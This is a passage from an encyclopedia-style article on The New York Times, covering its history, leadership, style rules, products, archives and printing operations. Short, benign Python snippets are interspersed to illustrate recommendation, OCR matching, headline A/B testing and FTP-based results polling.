to further criticism from the George W. Bush administration and the Senate's refusal to renew the Patriot Act. 
69 In the Plame affair, a Central Intelligence Agency inquiry found that Miller had become aware of Valerie Plame's identity through then-vice president Dick Cheney's chief of staff Scooter Libby, resulting in Miller's resignation. 70 During the Great Recession, The New York Times suffered significant fiscal difficulties as a consequence of the subprime mortgage crisis and a decline in classified advertising. 71 Exacerbated by Rupert Murdoch's revitalization of The Wall Street Journal through his acquisition of Dow Jones Company, The New York Times Company began enacting measures to reduce the newsroom budget. The company was forced to borrow $250 million (equivalent to $353.79 million in 2023) from Mexican billionaire Carlos Slim and fired over one hundred employees by 2010. 72 nytimes.com's coverage of the Eliot Spitzer prostitution scandal, resulting in the resignation of then-New York governor Eliot Spitzer, furthered the legitimacy of the website as a journalistic medium. 73 The Times's economic downturn renewed discussions of an online paywall; 74 The New York Times implemented a paywall in March 2011. 75 Abramson succeeded Keller, 76 continuing her characteristic investigations into corporate and government malfeasance into the Times's coverage. 77 Following conflicts with newly appointed chief executive Mark Thompson's ambitions, 78 Abramson was dismissed by Sulzberger Jr., who named Dean Baquet as her replacement. 79 Leading up to the 2016 presidential election, The New York Times elevated the Hillary Clinton email controversy 80 and the Uranium One controversy; 81 national security correspondent Michael S. Schmidt initially wrote an article in March 2015 stating that Hillary Clinton had used a private email server as secretary of state. 82 Donald Trump's upset victory contributed to an increase in subscriptions to the Times. 83 The New York Times experienced unprecedented indignation from Trump, who referred to publications such as the Times as "enemies of the people" at the Conservative Political Action Conference and tweeting his disdain for the newspaper and CNN. 84 In October 2017, The New York Times published an article by journalists Jodi Kantor and Megan Twohey alleging that dozens of women had accused film producer and The Weinstein Company co-chairman Harvey Weinstein of sexual misconduct. 85 The investigation resulted in Weinstein's resignation and conviction, 86 precipitated the Weinstein effect, 87 and served as a catalyst for the MeToo movement. 88 The New York Times Company vacated the public editor position 89 and eliminated the copy desk in November. 90 Sulzberger Jr. announced his resignation in December 2017, appointing his son, A. G. Sulzberger, as publisher. 91 Trump's relationship — equally diplomatic and negative — marked Sulzberger's tenure. 92 In September 2018, The New York Times published "I Am Part of the Resistance Inside the Trump Administration", an anonymous essay by a self-described Trump administration official later revealed to be Department of Homeland Security chief of staff Miles Taylor. 93 The animosity — which extended to nearly three hundred instances of Trump disparaging the Times by May 2019 — 94 culminated in Trump ordering federal agencies to cancel their subscriptions to The New York Times and The Washington Post in October 2019. 95 Trump's tax returns have been the subject of three separate investigations. c During the COVID 19 pandemic, the Times began implementing data services and graphs. 
99 On May 23, 2020, The New York Times's front page solely featured U.S. Deaths Near 100,000, An Incalculable Loss, a subset of the 100,000 people in the United States who died of COVID 19, the first time that the Times's front page lacked images since they were introduced. 100 Since 2020, The New York Times has focused on broader diversification, developing online games and producing television series. 101 The New York Times Company acquired The Athletic in January 2022. 102 Since 1896, The New York Times has been published by the Ochs-Sulzberger family, having previously been published by Henry Jarvis Raymond until 1869 103 and by George Jones until 1896. 104 Adolph Ochs published the Times until his death in 1935, 105 when he was succeeded by his son-in-law, Arthur Hays Sulzberger. Sulzberger was publisher until 1961 106 and was succeeded by Orvil Dryfoos, his son-in-law, who served in the position until his death in 1963. 107 Arthur Ochs Sulzberger succeeded Dryfoos until his resignation in 1992. 108 His son, Arthur Ochs Sulzberger Jr., served as publisher until 2018. The New York Times's current publisher is A. G. Sulzberger, Sulzberger Jr.'s son. 91 As of 2023, the Times's executive editor is Joseph Kahn 109 and the paper's managing editors are Marc Lacey and Carolyn Ryan, having been appointed in June 2022. 110 The New York Times's deputy managing editors are Sam Dolnick, 111 Monica Drake, 112 and Steve Duenes, 113 and the paper's assistant managing editors are Matthew Ericson, 114 Jonathan Galinsky, Hannah Poferl, Sam Sifton, Karron Skog, 115 and Michael Slackman. 116 The New York Times is owned by The New York Times Company, a publicly traded company. The New York Times Company, in addition to the Times, owns Wirecutter, The Athletic, The New York Times Cooking, and The New York Times Games, and acquired Serial Productions and Audm. The New York Times Company holds undisclosed minority investments in multiple other businesses, and formerly owned The Boston Globe and several radio and television stations. 117 The New York Times Company is majority-owned by the Ochs-Sulzberger family through elevated shares in the company's dual-class stock structure held largely in a trust, in effect since the 1950s; 118 as of 2022, the family holds ninety-five percent of The New York Times Company's Class B shares, allowing it to elect seventy percent of the company's board of directors. 119 Class A shareholders have restrictive voting rights. 120 As of 2023, The New York Times Company's chief executive is Meredith Kopit Levien, the company's former chief operating officer who was appointed in September 2020. 121 As of March 2023, The New York Times Company employs 5,800 individuals, 101 including 1,700 journalists according to deputy managing editor Sam Dolnick. 122 Journalists for The New York Times may not run for public office, provide financial support to political candidates or causes, endorse candidates, or demonstrate public support for causes or movements. 123 Journalists are subject to the guidelines established in "Ethical Journalism" and "Guidelines on Integrity". 124 According to the former, Times journalists must abstain from using sources with a personal relationship to them and must not accept reimbursements or inducements from individuals who may be written about in The New York Times, with exceptions for gifts of nominal value. 125 The latter requires attribution and exact quotations, though exceptions are made for linguistic anomalies. 
Staff writers are expected to ensure the veracity of all written claims, but may delegate researching obscure facts to the research desk. 126 In March 2021, the Times established a committee to avoid journalistic conflicts of interest with work written for The New York Times, following columnist David Brooks's resignation from the Aspen Institute for his undisclosed work on the initiative Weave. 127 The New York Times editorial board was established in 1896 by Adolph Ochs. With the opinion department, the editorial board is independent of the newsroom. 166 Then-editor-in-chief Charles Ransom Miller served as opinion editor from 1883 until his death in 1922. 167 Rollo Ogden succeeded Miller until his death in 1937. 168 From 1937 to 1938, John Huston Finley served as opinion editor; in a prearranged plan, Charles Merz succeeded Finley. 169 Merz served in the position until his retirement in 1961. 170 John Bertram Oakes served as opinion editor from 1961 to 1976, when then-publisher Arthur Ochs Sulzberger appointed Max Frankel. 171 Frankel served in the position until 1986, when he was appointed as executive editor. 172 Jack Rosenthal was the opinion editor from 1986 to 1993. 173 Howell Raines succeeded Rosenthal until 2001, when he was made executive editor. 174 Gail Collins succeeded Raines until her resignation in 2006. 175 From 2007 to 2016, Andrew Rosenthal was the opinion editor. 176 James Bennet succeeded Rosenthal until his resignation in 2020. 177 As of July 2024 update , the editorial board comprises thirteen opinion writers. 178 The New York Times's opinion editor is Kathleen Kingsbury 179 and the deputy opinion editor is Patrick Healy. 115 The New York Times's editorial board was initially opposed to liberal beliefs, opposing women's suffrage in 1900 and 1914. The editorial board began to espouse progressive beliefs during Oakes' tenure, conflicting with the Ochs-Sulzberger family, of which Oakes was a member as Adolph Ochs's nephew; in 1976, Oakes publicly disagreed with Sulzberger's endorsement of Daniel Patrick Moynihan over Bella Abzug in the 1976 Senate Democratic primaries in a letter sent from Martha's Vineyard. Under Rosenthal, the editorial board took positions supporting assault weapons legislation and the legalization of marijuana, but publicly criticized the Obama administration over its portrayal of terrorism. 176 In presidential elections, The New York Times has endorsed a total of twelve Republican candidates and thirty Democratic candidates, and has endorsed the Democrat in every election since 1960. 180 181 j With the exception of Wendell Willkie, Republicans endorsed by the Times have won the presidency. In 2016, the editorial board issued an anti-endorsement against Donald Trump for the first time in its history. 182 The editorial board reduced its presence from several editorials each day to only for significant events in February 2020. Since August 2024, the board no longer endorses candidates in New York races . 183 Since 1940, editorial, media, and technology workers of The New York Times have been represented by the New York Times Guild. The Times Guild, along with the Times Tech Guild, are represented by the NewsGuild-CWA. 184 In 1940, Arthur Hays Sulzberger was called upon by the National Labor Relations Board amid accusations that he had discouraged Guild membership in the Times. Over the next few years, the Guild would ratify several contracts, expanding to editorial and news staff in 1942 and maintenance workers in 1943. 
185 The New York Times Guild has walked out several times in its history, including for six and a half hours in 1981 186 and in 2017, when copy editors and reporters walked out at lunchtime in response to the elimination of the copy desk. 187 On December 7, 2022, the union held a one-day strike, 188 the first interruption to The New York Times since 1978. 189 The New York Times Guild reached an agreement in May 2023 to increase minimum salaries for employees and a retroactive bonus. 190 The Times Tech Guild is the largest technology union with collective bargaining rights in the United States. 191 As of August 2024, The New York Times has 10.8 million subscribers, with 10.2 million online subscribers and 600,000 print subscribers, 192 the second-largest newspaper by print circulation in the United States behind The Wall Street Journal. 193 The New York Times Company intends to have fifteen million subscribers by 2027. 194 The Times's shift towards subscription-based revenue with the debut of an online paywall in 2011 contributed to subscription revenue exceeding advertising revenue the following year, furthered by the 2016 presidential election and Donald Trump. 195 In 2022, Vox wrote that The New York Times's subscribers skew "older, richer, whiter, and more liberal"; to reflect the general population of the United States, the Times has attempted to alter its audience by acquiring The Athletic, investing in verticals such as The New York Times Games, and beginning a marketing campaign showing diverse subscribers to the Times. The New York Times Company chief executive Meredith Kopit Levien stated that the average age of subscribers has remained constant. 196 In October 2001, The New York Times began publishing DealBook, a financial newsletter edited by Andrew Ross Sorkin. The Times had intended to publish the newsletter in September, but delayed its debut following the September 11 attacks. 197 A website for DealBook was established in March 2006. 198 The New York Times began shifting towards DealBook as part of the newspaper's financial coverage in November 2010 with a renewed website and a presence in the Times's print edition. 199 In 2011, the Times began hosting the DealBook Summit, an annual conference hosted by Sorkin. 200 During the COVID 19 pandemic, The New York Times hosted the DealBook Online Summit in 2020 201 and 2021. 202 The 2022 DealBook Summit featured — among other speakers — former vice president Mike Pence and Israeli prime minister Benjamin Netanyahu, 203 culminating in an interview with former FTX chief executive Sam Bankman-Fried; FTX had filed for bankruptcy several weeks prior. 204 The 2023 DealBook Summit's speakers included vice president Kamala Harris, Israeli president Isaac Herzog, and businessman Elon Musk. 200 In June 2010, The New York Times licensed the political blog FiveThirtyEight in a three-year agreement. 205 The blog, written by Nate Silver, had garnered attention during the 2008 presidential election for predicting the elections in forty-nine of fifty states. FiveThirtyEight appeared on nytimes.com in August. 206 According to Silver, several offers were made for the blog; Silver wrote that a merger of unequals must allow for editorial sovereignty and resources from the acquirer, comparing himself to Groucho Marx. 207 According to The New Republic, FiveThirtyEight drew as much as a fifth of the traffic to nytimes.com during the 2012 presidential election. 208 In July 2013, FiveThirtyEight was sold to ESPN. 
209 In an article following Silver's exit, public editor Margaret Sullivan wrote that he was disruptive to the Times's culture for his perspective on probability-based predictions and scorn for polling — having stated that punditry is "fundamentally useless", comparing him to Billy Beane, who implemented sabermetrics in baseball. According to Sullivan, his work was criticized by several notable political journalists. 210 The New Republic obtained a memo in November 2013 revealing then-Washington bureau chief David Leonhardt's ambitions to establish a data-driven newsletter with presidential historian Michael Beschloss, graphic designer Amanda Cox, economist Justin Wolfers, and The New Republic journalist Nate Cohn. 211 By March, Leonhardt had amassed fifteen employees from within The New York Times; the newsletter's staff included individuals who had created the Times's dialect quiz, fourth down analyzer, and a calculator for determining buying or renting a home. 212 The Upshot debuted in April 2014. 213 Fast Company reviewed an article about Illinois Secure Choice — a state-funded retirement saving system — as "neither a terse news item, nor a formal financial advice column, nor a politically charged response to economic policy", citing its informal and neutral tone. 214 The Upshot developed "the needle" for the 2016 presidential election and 2020 presidential elections, a thermometer dial displaying the probability of a candidate winning. 215 In January 2016, Cox was named editor of The Upshot. 216 Kevin Quealy was named editor in June 2022. 217 According to an internal readership poll conducted by The New York Times in 2019, eighty-four percent of readers identified as liberal. 218 In February 1942, The New York Times crossword debuted in The New York Times Magazine; according to Richard Shepard, the attack on Pearl Harbor in December 1941 convinced then-publisher Arthur Hays Sulzberger of the necessity of a crossword. 219 The New York Times has published recipes since the 1850s and has had a separate food section since the 1940s. 220 In 1961, restaurant critic Craig Claiborne published The New York Times Cookbook, 221 an unauthorized cookbook that drew from the Times's recipes. 222 Since 2010, former food editor Amanda Hesser has published The Essential New York Times Cookbook, a compendium of recipes from The New York Times. 223 The Innovation Report in 2014 revealed that the Times had attempted to establish a cooking website since 1998, but faced difficulties with the absence of a defined data structure. 224 In September 2014, The New York Times introduced NYT Cooking, an application and website. 225 Edited by food editor Sam Sifton, 222 the Times's cooking website features 21,000 recipes as of 2022. 226 NYT Cooking features videos as part of an effort by Sifton to hire two former Tasty employees from BuzzFeed. 222 In August 2023, NYT Cooking added personalized recommendations through the cosine similarity of text embeddings of recipe titles. 227 The website also features no-recipe recipes, a concept proposed by Sifton. 228 In May 2016, The New York Times Company announced a partnership with startup Chef'd to form a meal delivery service that would deliver ingredients from The New York Times Cooking recipes to subscribers; 229 Chef'd shut down in July 2018 after failing to accrue capital and secure financing. 
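The NYT Cooking recommendation change described above relies on cosine similarity between text embeddings of recipe titles. The Times's embedding model is not public, so the sketch below uses TF-IDF vectors from scikit-learn as a stand-in; the titles and the choice of vectorizer are illustrative assumptions only.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

titles = [
    "Spicy Roasted Chicken Thighs",
    "Roasted Chicken with Lemon",
    "Classic Beef Chili",
    "Vegetarian Chili with Beans",
]

vectorizer = TfidfVectorizer()
embeddings = vectorizer.fit_transform(titles)    # one vector per recipe title
similarities = cosine_similarity(embeddings)     # pairwise cosine scores

def recommend(title_index, top_n=2):
    # Rank every other title by its similarity to the chosen one
    scores = [(i, s) for i, s in enumerate(similarities[title_index]) if i != title_index]
    scores.sort(key=lambda pair: pair[1], reverse=True)
    return [titles[i] for i, _ in scores[:top_n]]

print(recommend(0))   # titles most similar to "Spicy Roasted Chicken Thighs"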
230 The Hollywood Reporter reported in September 2022 that the Times would expand its delivery options to US$95 cooking kits curated by chefs such as Nina Compton, Chintan Pandya, and Naoko Takei Moore. That month, the staff of NYT Cooking went on tour with Compton, Pandya, and Moore in Los Angeles, New Orleans, and New York City, culminating in a food festival. 231 In addition, The New York Times offered its own wine club originally operated by the Global Wine Company. The New York Times Wine Club was established in August 2009, during a dramatic decrease in advertising revenue. 232 By 2021, the wine club was managed by Lot18, a company that provides proprietary labels. Lot18 managed the Williams Sonoma Wine Club and its own wine club Tasting Room. 233 The New York Times archives its articles in a basement annex beneath its building known as "the morgue", a venture started by managing editor Carr Van Anda in 1907. The morgue comprises news clippings, a pictures library, and the Times's book and periodicals library. As of 2014, it is the largest library of any media company, dating back to 1851. 234 In November 2018, The New York Times partnered with Google to digitize the Archival Library. 235 Additionally, The New York Times has maintained a virtual microfilm reader known as TimesMachine since 2014. The service launched with archives from 1851 to 1980; in 2016, TimesMachine expanded to include archives from 1981 to 2002. The Times built a pipeline to take in TIFF images, article metadata in XML and an INI file of Cartesian geometry describing the boundaries of the page, and convert it into a PNG of image tiles and JSON containing the information in the XML and INI files. The image tiles are generated using GDAL and displayed using Leaflet, using data from a content delivery network. The Times ran optical character recognition on the articles using Tesseract and shingled and fuzzy string matched the result. 236 The New York Times uses a proprietary 237 content management system known as Scoop for its online content and the Microsoft Word-based content management system CCI for its print content. Scoop was developed in 2008 to serve as a secondary content management system for editors working in CCI to publish their content on the Times's website; as part of The New York Times's online endeavors, editors now write their content in Scoop and send their work to CCI for print publication. Since its introduction, Scoop has superseded several processes within the Times, including print edition planning and collaboration, and features tools such as multimedia integration, notifications, content tagging, and drafts. The New York Times uses private articles for high-profile opinion pieces, such as those written by Russian president Vladimir Putin and actress Angelina Jolie, and for high-level investigations. 238 In January 2012, the Times released Integrated Content Editor (ICE), a revision tracking tool for WordPress and TinyMCE. ICE is integrated within the Times's workflow by providing a unified text editor for print and online editors, reducing the divide between print and online operations. 239 By 2017, 240 The New York Times began developing a new authoring tool to its content management system known as Oak, in an attempt to further the Times's visual efforts in articles and reduce the discrepancy between the mediums in print and online articles. 241 The system reduces the input of editors and supports additional visual mediums in an editor that resembles the appearance of the article. 
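Returning to the TimesMachine pipeline described above: its final step shingles the OCR output and fuzzy-matches it against article text. The exact matcher the Times uses is not stated, so the sketch below is a minimal stand-in built on word shingles and difflib, with invented strings.

from difflib import SequenceMatcher

def shingles(text, size=3):
    # Break text into overlapping word n-grams ("shingles")
    words = text.split()
    return [" ".join(words[i:i + size]) for i in range(len(words) - size + 1)]

def best_match(ocr_fragment, article_text, size=3):
    # Score the noisy OCR fragment against every shingle of the clean article
    # text and return the closest shingle with its similarity ratio.
    scored = [
        (SequenceMatcher(None, ocr_fragment.lower(), s.lower()).ratio(), s)
        for s in shingles(article_text, size)
    ]
    return max(scored)

article = "Men walk on moon astronauts land on plain collect rocks plant flag"
ocr_fragment = "astronavts land on plam"   # typical OCR noise
print(best_match(ocr_fragment, article))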
240 Oak is based on ProseMirror, a JavaScript rich-text editor toolkit, and retains the revision tracking and commenting functionalities of The New York Times's previous systems. Additionally, Oak supports predefined article headers. 242 In 2019, Oak was updated to support collaborative editing using Firebase to update editors's cursor status. Several Google Cloud Functions and Google Cloud Tasks allow articles to be previewed as they will be printed, and the Times's primary MySQL database is regularly updated to update editors on the article status. 243 Since 1895, The New York Times has maintained a manual of style in several forms. The New York Times Manual of Style and Usage was published on the Times's intranet in 1999. 244 The New York Times uses honorifics when referring to individuals. With the AP Stylebook's removal of honorifics in 2000 and The Wall Street Journal's omission of courtesy titles in May 2023, the Times is the only national newspaper that continues to use honorifics. According to former copy editor Merrill Perlman, The New York Times continues to use honorifics as a "sign of civility". 245 The Times's use of courtesy titles led to an apocryphal rumor that the paper had referred to singer Meat Loaf as "Mr. Loaf". 246 Several exceptions have been made; the former sports section and The New York Times Book Review do not use honorifics. 247 A leaked memo following the killing of Osama bin Laden in May 2011 revealed that editors were given a last-minute instruction to omit the honorific from Osama bin Laden's name, consistent with deceased figures of historic significance, such as Adolf Hitler, Napoleon, and Vladimir Lenin. 248 The New York Times uses academic and military titles for individuals prominently serving in that position. 249 In 1986, the Times began to use Ms, 247 and introduced the gender-neutral title Mx. in 2015. 250 The New York Times uses initials when a subject has expressed a preference, such as Donald Trump. 251 The New York Times maintains a strict but not absolute obscenity policy, including phrases. In a review of the Canadian hardcore punk band Fucked Up, music critic Kelefa Sanneh wrote that the band's name—entirely rendered in asterisks—would not be printed in the Times "unless an American president, or someone similar, says it by mistake"; 252 The New York Times did not repeat then-vice president Dick Cheney's use of "fuck" against then-senator Patrick Leahy in 2004 253 or then-vice president Joe Biden's remarks that the passage of the Affordable Care Act in 2010 was a "big fucking deal". 254 The Times's profanity policy has been tested by former president Donald Trump. The New York Times published Trump's Access Hollywood tape in October 2016, containing the words "fuck", "pussy", "bitch", and "tits", the first time the publication had published an expletive on its front page, 255 and repeated an explicit phrase for fellatio stated by then-White House communications director Anthony Scaramucci in July 2017. 256 The New York Times omitted Trump's use of the phrase "shithole countries" from its headline in favor of "vulgar language" in January 2018. 257 The Times banned certain words, such as "bitch", "whore", and "sluts", from Wordle in 2022. 258 Journalists for The New York Times do not write their own headlines, but rather copy editors who specifically write headlines. The Times's guidelines insist headline editors get to the main point of an article but avoid giving away endings, if present. 
Other guidelines include using slang "sparingly", avoiding tabloid headlines, not ending a line on a preposition, article, or adjective, and, chiefly, not punning. The New York Times Manual of Style and Usage states that wordplay, such as "Rubber Industry Bounces Back", is to be tested on a colleague as a canary is to be tested in a coal mine; "when no song bursts forth, start rewriting". 259 The New York Times has amended headlines due to controversy. In 2019, following two back-to-back mass shootings in El Paso and Dayton, the Times used the headline, "Trump Urges Unity vs. Racism", to describe then-president Donald Trump's words after the shootings. After criticism from FiveThirtyEight founder Nate Silver, the headline was changed to, "Assailing Hate But Not Guns". 260 Online, The New York Times's headlines do not face the same length restrictions as headlines that appear in print; print headlines must fit within a column, often six words. Additionally, headlines must "break" properly, containing a complete thought on each line without splitting up prepositions and adverbs. Writers may edit a headline to fit an article more aptly if further developments occur. The Times uses A/B testing for articles on the front page, placing two headlines against each other; at the end of the test, the headline that receives more traffic is chosen. 261 The alteration of a headline regarding intercepted Russian data used in the Mueller special counsel investigation was noted by Trump in a March 2017 interview with Time, in which he claimed that the headline used the word "wiretapped" in the print version of the paper on January 20, while the digital article on January 19 omitted the word. The headline was intentionally changed in the print version to use "wiretapped" in order to fit within the print guidelines. 262 The nameplate of The New York Times has been unaltered since 1967. In creating the initial nameplate, Henry Jarvis Raymond modeled it on that of The London Times, which used a Blackletter style called Textura (popularized following the fall of the Western Roman Empire and derived from regional variations of Alcuin's script) as well as a period. With the change to The New-York Times on September 14, 1857, the nameplate followed. Under George Jones, the terminals of the "N", "r", and "s" were intentionally exaggerated into swashes. The nameplate in the January 15, 1894, issue trimmed the terminals once more, smoothed the edges, and turned the stem supporting the "T" into an ornament. The hyphen was dropped on December 1, 1896, after Adolph Ochs purchased the paper. The descender of the "h" was shortened on December 30, 1914. The largest change to the nameplate was introduced on February 21, 1967, when type designer Ed Benguiat redesigned the logo, most prominently turning the arrow ornament into a diamond. Notoriously, the new logo dropped the period that had remained with the Times up until that point; one reader compared the omission of the period to "performing plastic surgery on Helen of Troy." Picture editor John Radosta worked with a New York University professor to determine that dropping the period saved the paper US$41.28 (equivalent to $377.21 in 2023). 263 As of December 2023, The New York Times has printed sixty thousand issues, a statistic represented in the paper's masthead to the right of the volume number, which gives the Times's years in publication in Roman numerals. 
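The front-page A/B test described above can be sketched in a few lines of Python. This is an illustrative simulation only: the even traffic split, the invented click rates, and the sample size are all assumptions, and the Times's real testing tooling is not public.

import random

headlines = {"A": "Biden Beats Trump", "B": "It's Biden"}
shown = {"A": 0, "B": 0}
clicked = {"A": 0, "B": 0}

# Hypothetical underlying click-through rates; in a real test these are unknown.
TRUE_RATES = {"A": 0.060, "B": 0.045}

def serve_visitor():
    variant = random.choice(["A", "B"])      # split front-page traffic evenly
    shown[variant] += 1
    if random.random() < TRUE_RATES[variant]:
        clicked[variant] += 1

for _ in range(20000):                       # simulate 20,000 visitors
    serve_visitor()

rates = {v: clicked[v] / shown[v] for v in headlines}
winner = max(rates, key=rates.get)
print(rates, "->", headlines[winner])        # the higher-traffic headline wins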
264 The volume and issue numbers are separated by dots representing the edition number of that issue; on the day of the 2000 presidential election, the Times was revised four separate times, necessitating the use of an em dash in place of an ellipsis. 265 The em dash issue was printed hundreds of times over before being replaced by the one-dot issue. Despite efforts by newsroom employees to recycle copies sent to The New York Times's office, several copies were kept, including one put on display at the Museum at The Times. 266 From February 7, 1898, to December 31, 1999, the Times's issue number was incorrect by five hundred issues, an error suspected by The Atlantic to be the result of a careless front-page type editor. The misreporting was noticed by news editor Aaron Donovan, who was calculating the number of issues in a spreadsheet and noticed the discrepancy. The New York Times celebrated fifty thousand issues on March 14, 1995, an observance that should have occurred on July 26, 1996. 267 The New York Times has reduced the physical size of its print edition while retaining its broadsheet format. The New-York Daily Times debuted at 18 inches (460 mm) across. By the 1950s, the Times was being printed at 16 inches (410 mm) across. In 1953, an increase in paper costs of US$10 (equivalent to $113.88 in 2023) a ton raised newsprint costs to US$21.7 million (equivalent to $308,616,417.91 in 2023). On December 28, 1953, the pages were reduced to 15.5 inches (390 mm). On February 14, 1955, a further reduction to 15 inches (380 mm) occurred, followed by 14.5 and 13.5 inches (370 and 340 mm). On August 6, 2007, the largest cut occurred when the pages were reduced to 12 inches (300 mm), k a decision that other broadsheets had previously considered. Then-executive editor Bill Keller stated that a narrower paper would be more beneficial to the reader but acknowledged a net loss in article space of five percent. 268 In 1985, The New York Times Company acquired a minority stake in a US$21.7 million newsprint plant in Clermont, Quebec, through Donahue Malbaie. 269 The company sold its equity interest in Donahue Malbaie in 2017. 270 The New York Times often uses large, bolded headlines for major events. For the print version of the Times, these headlines are written by one copy editor, reviewed by two other copy editors, approved by the masthead editors, and polished by other print editors. The process is completed before 8 p.m., but it may be repeated if further developments occur, as happened during the 2020 presidential election. On the day Joe Biden was declared the winner, The New York Times used a "hammer headline" reading, "Biden Beats Trump", in all caps and bolded. A dozen journalists discussed several potential headlines, such as "It's Biden" or "Biden's Moment", and prepared for a Donald Trump victory, in which case they would have used "Trump Prevails". 271 During Trump's first impeachment, the Times drafted the hammer headline, "Trump Impeached". The New York Times adjusted the kerning between the E and the A, as not doing so would leave a noticeable gap due to the stem of the A sloping away from the E. The Times reused the tight kerning for "Biden Beats Trump" and Trump's second impeachment, which simply read, "Impeached". 272 In cases where two major events occur on the same day or immediately after each other, The New York Times has used a "paddle wheel" headline, where both headlines are used but split by a line. 
The term dates back to August 8, 1959, when it was revealed that the United States was monitoring Soviet missile firings and when Explorer 6 — shaped like a paddle wheel — launched. Since then, the paddle wheel has been used several times, including on January 21, 1981, when Ronald Reagan was sworn in minutes before Iran released fifty-two American hostages, ending the Iran hostage crisis. At the time, most newspapers favored the end of the hostage crisis, but the Times placed the inauguration above the crisis. Since 1981, the paddle wheel has been used twice: on July 26, 2000, when the 2000 Camp David Summit ended without an agreement and George W. Bush announced that Dick Cheney would be his running mate, and on June 24, 2016, when the United Kingdom European Union membership referendum passed, beginning Brexit, and the Supreme Court deadlocked in United States v. Texas. 273 The New York Times has run editorials from its editorial board on the front page twice. On June 13, 1920, the Times ran an editorial opposing Warren G. Harding, who had been nominated as that year's Republican presidential candidate. 274 Amid growing acceptance of front-page editorials 275 at publications such as the Detroit Free Press, The Patriot-News, The Arizona Republic, and The Indianapolis Star, The New York Times ran an editorial on its front page on December 5, 2015, following a terrorist attack in San Bernardino, California, in which fourteen people were killed. 276 The editorial advocated for the prohibition of "slightly modified combat rifles" used in the San Bernardino shooting and "certain kinds of ammunition". 274 Conservative figures, including Texas senator Ted Cruz, The Weekly Standard editor Bill Kristol, Fox & Friends co-anchor Steve Doocy, and then-New Jersey governor Chris Christie criticized the Times. Talk radio host Erick Erickson fired several rounds into an issue of The New York Times and posted a picture online. 277 Since 1997, 278 The New York Times's primary distribution center has been located in College Point, Queens. The facility is 300,000 sq ft (28,000 m2) and employs 170 people as of 2017. The College Point distribution center prints 300,000 to 800,000 newspapers daily. On most occasions, presses start before 11 p.m. and finish before 3 a.m. A robotic crane grabs rolls of newsprint, and a series of rollers ensures ink can be printed onto the paper. The final newspapers are wrapped in plastic and shipped out. 279 As of 2018, the College Point facility accounted for 41 percent of production. Other copies are printed at the facilities of 26 other publications, such as The Atlanta Journal-Constitution, The Dallas Morning News, The Santa Fe New Mexican, and the Courier Journal. With the decline of newspapers, particularly regional publications, copies of the Times must travel further; for example, newspapers for Hawaii are flown from San Francisco on United Airlines, and Sunday papers are flown from Los Angeles on Hawaiian Airlines. Computer glitches, mechanical issues, and weather phenomena affect circulation but do not stop the paper from reaching customers. 280 The College Point facility prints over two dozen other papers, including The Wall Street Journal and USA Today. 281 The New York Times has halted its printing process several times to account for major developments. The first printing stoppage occurred on March 31, 1968, when then-president Lyndon B. Johnson announced that he would not seek reelection. 
Other press stoppages include May 19, 1994, for the death of former first lady Jacqueline Kennedy Onassis, and July 17, 1996, for the crash of Trans World Airlines Flight 800. The 2000 presidential election necessitated two press stoppages. Al Gore appeared to concede on November 8, forcing then-executive editor Joseph Lelyveld to stop the Times's presses to print a new headline, "Bush Appears to Defeat Gore", with a story that stated George W. Bush was elected president. However, Gore held off his concession speech amid doubts about the result in Florida, and Lelyveld stopped the presses a second time to run the headline, "Bush and Gore Vie for an Edge". Since 2000, three printing stoppages have occurred: for the death of William Rehnquist on September 3, 2005; for the killing of Osama bin Laden on May 1, 2011; and for the passage of the Marriage Equality Act in the New York State Assembly and its subsequent signing by then-governor Andrew Cuomo on June 24, 2011. 282 The New York Times website is hosted at nytimes.com. It has undergone several major redesigns and infrastructure developments since its debut. In April 2006, The New York Times redesigned its website with an emphasis on multimedia. 283 In preparation for Super Tuesday in February 2008, the Times developed a live election system using the Associated Press's File Transfer Protocol (FTP) service and a Ruby on Rails application; nytimes.com experienced its largest traffic to date on Super Tuesday and the day after. 284 The NYTimes application debuted with the introduction of the App Store on July 10, 2008. Engadget's Scott McNulty wrote critically of the app, negatively comparing it to The New York Times's mobile website. 285 An iPad version with select articles was released on April 3, 2010, with the release of the first-generation iPad. 286 In October, The New York Times expanded NYT Editors' Choice to include the paper's full articles. NYT for iPad was free until 2011. 287 The Times applications on iPhone and iPad began offering in-app subscriptions in July 2011. 288 The Times released a web application for iPad — featuring a format summarizing trending headlines on Twitter 289 — and a Windows 8 application in October 2012. 290 Efforts to ensure profitability through an online magazine and a "Need to Know" subscription were reported by Adweek in July 2013. 291 In March 2014, The New York Times announced three applications — NYT Now, an application that offers pertinent news in a blog format, and two unnamed applications, later known as NYT Opinion 292 and NYT Cooking 224 — to diversify its product offerings. 293 "The Daily is the modern front page of The New York Times." —Sam Dolnick, speaking to Intelligencer in January 2020 294 The New York Times manages several podcasts, including multiple podcasts with Serial Productions. The Times's longest-running podcast is The Book Review Podcast, 295 debuting as Inside The New York Times Book Review in April 2006. 296 The New York Times's defining podcast is The Daily, 294 a daily news podcast hosted by Michael Barbaro and, since March 2022, Sabrina Tavernise. 297 The podcast debuted on February 1, 2017. 298 In October 2021, The New York Times began testing "New York Times Audio", an application featuring podcasts from the Times, audio versions of articles (including from other publications through Audm), and archives from This American Life. 299 The application debuted in May 2023 exclusively on iOS for Times subscribers. New York Times Audio includes exclusive podcasts such as The Headlines, a daily news recap, and Shorts, short audio stories under ten minutes. 
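The 2008 live election setup mentioned above pulled results over the AP's FTP service into a Ruby on Rails application. As a rough illustration of that pattern in the Python used elsewhere in this notebook, the sketch below polls an FTP drop for a results file; the host, credentials, file path, and CSV format are all placeholders, not the AP's actual feed.

from ftplib import FTP
import csv
import io
import time

HOST, USER, PASSWORD = "ftp.example.com", "user", "secret"   # placeholder credentials
RESULTS_FILE = "results/super_tuesday.csv"                   # placeholder path

def fetch_results():
    # Download the latest results file into memory and parse it as CSV
    buffer = io.BytesIO()
    with FTP(HOST) as ftp:
        ftp.login(USER, PASSWORD)
        ftp.retrbinary(f"RETR {RESULTS_FILE}", buffer.write)
    return list(csv.DictReader(io.StringIO(buffer.getvalue().decode("utf-8"))))

for _ in range(3):              # poll a few times; a real system would loop continuously
    for row in fetch_results():
        print(row)              # hand each row to whatever renders the live results
    time.sleep(60)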
